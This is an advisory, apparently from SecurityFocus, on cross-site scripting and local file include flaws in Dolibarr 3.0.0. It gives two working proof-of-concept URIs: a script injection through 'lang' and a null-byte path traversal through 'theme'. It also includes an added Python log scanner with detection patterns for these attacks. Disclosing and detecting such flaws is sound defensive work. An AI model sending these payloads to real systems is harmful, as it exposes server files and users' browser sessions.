Dolibarr Local File Include and Cross Site Scripting Vulnerabilities

Attackers can exploit these issues via a browser. To exploit a cross-site scripting issue, attackers must entice an unsuspecting user to follow a malicious URI.

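The following example URIs are available. The first demonstrates the cross-site scripting issue through the `lang` parameter, and the second demonstrates the local file include through the `theme` parameter: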

http://www.example.com/dolibarr-3.0.0/htdocs/document.php?lang=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E

http://www.example.com/dolibarr-3.0.0/htdocs/user/passwordforgotten.php?theme=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
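For defenders reviewing web server logs, the following added example (not part of the advisory and not Dolibarr code) flags request URIs whose `lang` or `theme` values look like the two cases above. The allow-list patterns, tag names and the benign sample URI are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Allow-list shapes (assumptions for this example, not Dolibarr's own rules):
# a language code such as "en" or "fr_FR", and a plain theme directory name.
RULES = {
    "lang": re.compile(r"[A-Za-z]{2,3}(?:[_-][A-Za-z]{2,4})?"),
    "theme": re.compile(r"[A-Za-z0-9_-]{1,64}"),
}


def findings(request_uri):
    """Return [(parameter, [tags])] for lang/theme values outside the allow-list."""
    hits = []
    # parse_qsl percent-decodes each value once, as the application would see it.
    for name, value in parse_qsl(urlsplit(request_uri).query, keep_blank_values=True):
        rule = RULES.get(name)
        if rule is None or rule.fullmatch(value):
            continue
        tags = []
        if "\x00" in value:                      # %00 used to truncate a file path
            tags.append("nul-byte")
        if re.search(r"\.\.[/\\]", value):       # ../ or ..\ directory climbing
            tags.append("path-traversal")
        if any(c in value for c in "<>\"'"):     # characters that break out of HTML
            tags.append("html-markup")
        hits.append((name, tags or ["unexpected-format"]))
    return hits


# The first two URIs are the ones quoted in the advisory; the third is constructed.
SAMPLES = [
    "/dolibarr-3.0.0/htdocs/document.php?lang=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E",
    "/dolibarr-3.0.0/htdocs/user/passwordforgotten.php"
    "?theme=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00",
    "/dolibarr-3.0.0/htdocs/user/passwordforgotten.php?theme=mytheme&lang=en_US",
]

if __name__ == "__main__":
    for uri in SAMPLES:
        print(findings(uri) or "clean", uri[:60])
```

The same allow-list check, applied server-side before the values reach the page output or a file path, rejects both requests.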


 

Copyright 2010, SecurityFocus